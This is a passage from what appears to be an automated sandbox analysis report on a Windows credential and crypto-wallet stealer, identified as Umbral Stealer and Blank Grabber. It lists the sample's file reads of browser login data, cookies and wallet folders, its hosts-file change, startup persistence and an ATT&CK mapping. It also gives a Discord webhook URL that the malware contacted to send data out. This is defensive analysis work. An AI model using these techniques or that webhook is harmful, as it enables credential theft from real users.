                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Lowering of HIPS / PFW / Operating System Security Settings

                        barindex
                        Modifies the hosts file
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Yara detected Blank Grabber
                        Source: Yara matchFile source: zamPeEkHWr.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.zamPeEkHWr.exe.1eaae570000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.1668669145.000001EAAE572000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2336242686.000001EAB073D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2336242686.000001EAB06A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: zamPeEkHWr.exe PID: 7396, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\kaS9T.scr, type: DROPPED
                        Yara detected Umbral Stealer
                        Source: Yara matchFile source: zamPeEkHWr.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.zamPeEkHWr.exe.1eaae570000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.1668669145.000001EAAE572000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: zamPeEkHWr.exe PID: 7396, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\kaS9T.scr, type: DROPPED
                        Found many strings related to Crypto-Wallets (likely being stolen)
                        Source: zamPeEkHWr.exe, 00000000.00000000.1668669145.000001EAAE572000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: Electrum
                        Source: zamPeEkHWr.exe, 00000000.00000000.1668669145.000001EAAE572000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: BytecoinJaxx!com.liberty.jaxx
                        Source: zamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB066C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 3C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                        Source: zamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB066C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 0C:\Users\user\AppData\Roaming\Ethereum\keystore
                        Source: zamPeEkHWr.exe, 00000000.00000000.1668669145.000001EAAE572000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: Exodus
                        Source: zamPeEkHWr.exe, 00000000.00000000.1668669145.000001EAAE572000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: Ethereum
                        Source: zamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB066C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 4C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                        Source: zamPeEkHWr.exe, 00000000.00000000.1668669145.000001EAAE572000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: keystore
                        Tries to harvest and steal browser information (history, passwords, etc)
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.logJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.logJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: Yara matchFile source: Process Memory Space: zamPeEkHWr.exe PID: 7396, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Yara detected Blank Grabber
                        Source: Yara matchFile source: zamPeEkHWr.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.zamPeEkHWr.exe.1eaae570000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.1668669145.000001EAAE572000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2336242686.000001EAB073D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2336242686.000001EAB06A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: zamPeEkHWr.exe PID: 7396, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\kaS9T.scr, type: DROPPED
                        Yara detected Umbral Stealer
                        Source: Yara matchFile source: zamPeEkHWr.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.zamPeEkHWr.exe.1eaae570000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.1668669145.000001EAAE572000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: zamPeEkHWr.exe PID: 7396, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\kaS9T.scr, type: DROPPED

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                        Windows Management Instrumentation                        		1
                        DLL Side-Loading                        		1
                        DLL Side-Loading                        		1
                        File and Directory Permissions Modification                        		1
                        OS Credential Dumping                        		22
                        System Information Discovery                        		Remote Services1
                        Archive Collected Data                        		3
                        Ingress Tool Transfer                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts11
                        Command and Scripting Interpreter                        		12
                        Registry Run Keys / Startup Folder                        		11
                        Process Injection                        		21
                        Disable or Modify Tools                        		LSASS Memory1
                        Query Registry                        		Remote Desktop Protocol2
                        Data from Local System                        		21
                        Encrypted Channel                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts1
                        PowerShell                        		Logon Script (Windows)12
                        Registry Run Keys / Startup Folder                        		11
                        Obfuscated Files or Information                        		Security Account Manager211
                        Security Software Discovery                        		SMB/Windows Admin SharesData from Network Shared Drive4
                        Non-Application Layer Protocol                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                        Timestomp                        		NTDS1
                        Process Discovery                        		Distributed Component Object ModelInput Capture15
                        Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        DLL Side-Loading                        		LSA Secrets41
                        Virtualization/Sandbox Evasion                        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        File Deletion                        		Cached Domain Credentials1
                        Application Window Discovery                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                        Masquerading                        		DCSync11
                        Remote System Discovery                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job41
                        Virtualization/Sandbox Evasion                        		Proc Filesystem11
                        System Network Configuration Discovery                        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                        Process Injection                        		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1488036 Sample: zamPeEkHWr.exe Startdate: 05/08/2024 Architecture: WINDOWS Score: 100 48 ptb.discord.com 2->48 50 ip-api.com 2->50 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 Antivirus detection for dropped file 2->60 62 13 other signatures 2->62 8 zamPeEkHWr.exe 15 15 2->8         started        signatures3 process4 dnsIp5 52 ip-api.com 208.95.112.1, 49731, 49738, 80 TUT-ASUS United States 8->52 54 ptb.discord.com 162.159.138.232, 443, 49740, 49741 CLOUDFLARENETUS United States 8->54 40 C:\ProgramData\Microsoft\...\kaS9T.scr, PE32 8->40 dropped 42 C:\Windows\System32\drivers\etc\hosts, ASCII 8->42 dropped 44 C:\Users\user\AppData\...\zamPeEkHWr.exe.log, ASCII 8->44 dropped 46 C:\ProgramData\...\kaS9T.scr:Zone.Identifier, ASCII 8->46 dropped 64 Suspicious powershell command line found 8->64 66 Found many strings related to Crypto-Wallets (likely being stolen) 8->66 68 Self deletion via cmd or bat file 8->68 70 7 other signatures 8->70 13 powershell.exe 23 8->13         started        16 cmd.exe 8->16         started        18 powershell.exe 11 8->18         started        20 9 other processes 8->20 file6 signatures7 process8 signatures9 72 Loading BitLocker PowerShell Module 13->72 22 WmiPrvSE.exe 13->22         started        24 conhost.exe 13->24         started        74 Uses ping.exe to check the status of other devices and networks 16->74 26 conhost.exe 16->26         started        28 PING.EXE 16->28         started        30 conhost.exe 18->30         started        32 conhost.exe 20->32         started        34 conhost.exe 20->34         started        36 conhost.exe 20->36         started        38 6 other processes 20->38 process10

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        zamPeEkHWr.exe82%ReversingLabsByteCode-MSIL.Trojan.UmbralStealer
                        zamPeEkHWr.exe100%AviraHEUR/AGEN.1307507
                        zamPeEkHWr.exe100%Joe Sandbox ML

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\kaS9T.scr100%AviraHEUR/AGEN.1307507
                        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\kaS9T.scr100%Joe Sandbox ML
                        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\kaS9T.scr82%ReversingLabsByteCode-MSIL.Trojan.UmbralStealer

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        http://nuget.org/NuGet.exe0%URL Reputationsafe
                        http://www.apache.org/licenses/LICENSE-2.00%URL Reputationsafe
                        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                        http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                        http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
                        https://contoso.com/License0%URL Reputationsafe
                        https://contoso.com/Icon0%URL Reputationsafe
                        http://crl.m0%URL Reputationsafe
                        http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                        https://contoso.com/0%URL Reputationsafe
                        https://nuget.org/nuget.exe0%URL Reputationsafe
                        http://ip-api.com0%URL Reputationsafe
                        https://oneget.orgX0%URL Reputationsafe
                        https://aka.ms/pscore680%URL Reputationsafe
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                        https://oneget.org0%URL Reputationsafe
                        http://ip-api.com/line/?fields=hosting0%URL Reputationsafe
                        https://discord.com/api/v10/users/0%Avira URL Cloudsafe
                        http://ptb.discord.com0%Avira URL Cloudsafe
                        https://go.microsof0%Avira URL Cloudsafe
                        https://github.com/Pester/Pester0%Avira URL Cloudsafe
                        https://ptb.discord.com/api/webhooks/1193833046810566716/Ip5p47J2qEw7d2YvXLGh3HLrizvUKpbZJnMXQxzQS4N9EYMFmhbB3hhBZhMwKm0ApaPL0%Avira URL Cloudsafe
                        https://discordapp.com/api/v9/users/0%Avira URL Cloudsafe
                        http://crl.microsoK0%Avira URL Cloudsafe
                        https://go.microsoft.cogDy0%Avira URL Cloudsafe
                        https://ptb.discord.com/api/webhooks/1193833046810566716/Ip5p47J2qEw7d2YvXLGh3HLrizvUKpbZJnMXQxzQS4N0%Avira URL Cloudsafe
                        https://github.com/Blank-c/Umbral-Stealer0%Avira URL Cloudsafe
                        http://ip-api.com/json/?fields=225545P0%Avira URL Cloudsafe
                        https://ptb.discord.com0%Avira URL Cloudsafe
                        http://ip-api.com/json/?fields=2255450%Avira URL Cloudsafe
                        https://go.m0%Avira URL Cloudsafe
                        http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806-0%Avira URL Cloudsafe
                        http://crl.micros0%Avira URL Cloudsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        ptb.discord.com
                        		162.159.138.232
                        		truetrue
                          		unknown
                          ip-api.com
                          		208.95.112.1
                          		truetrue
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            https://ptb.discord.com/api/webhooks/1193833046810566716/Ip5p47J2qEw7d2YvXLGh3HLrizvUKpbZJnMXQxzQS4N9EYMFmhbB3hhBZhMwKm0ApaPLtrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://ip-api.com/line/?fields=hostingfalse
                            • URL Reputation: safe
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://nuget.org/NuGet.exepowershell.exe, 00000005.00000002.1757050367.000001D310075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1894278502.000001BED4F48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1894278502.000001BED4E05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1817451274.000001BEC674A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2036403659.000001DE69631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2036403659.000001DE69767000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1925975234.000001DE5AE7B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2266136040.000002492F6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2119777600.000002492100A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2266136040.000002492F805000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 0000000A.00000002.1817451274.000001BEC658C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1925975234.000001DE5AD47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2119777600.0000024920AF2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://discord.com/api/v10/users/kaS9T.scr.0.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000017.00000002.2119777600.000002491F882000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000005.00000002.1740029520.000001D300228000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://ptb.discord.comzamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB07B7000.00000004.00000800.00020000.00000000.sdmp, zamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB073D000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000017.00000002.2119777600.000002491F882000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://crl.microsoKpowershell.exe, 00000005.00000002.1767821845.000001D36AB66000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://contoso.com/Licensepowershell.exe, 00000017.00000002.2266136040.000002492F805000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://discordapp.com/api/v9/users/zamPeEkHWr.exe, kaS9T.scr.0.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://contoso.com/Iconpowershell.exe, 00000017.00000002.2266136040.000002492F805000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://github.com/Pester/Pesterpowershell.exe, 00000017.00000002.2119777600.000002491F882000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://github.com/Blank-c/Umbral-StealerkaS9T.scr.0.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://crl.mpowershell.exe, 00000005.00000002.1765168613.000001D36A810000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
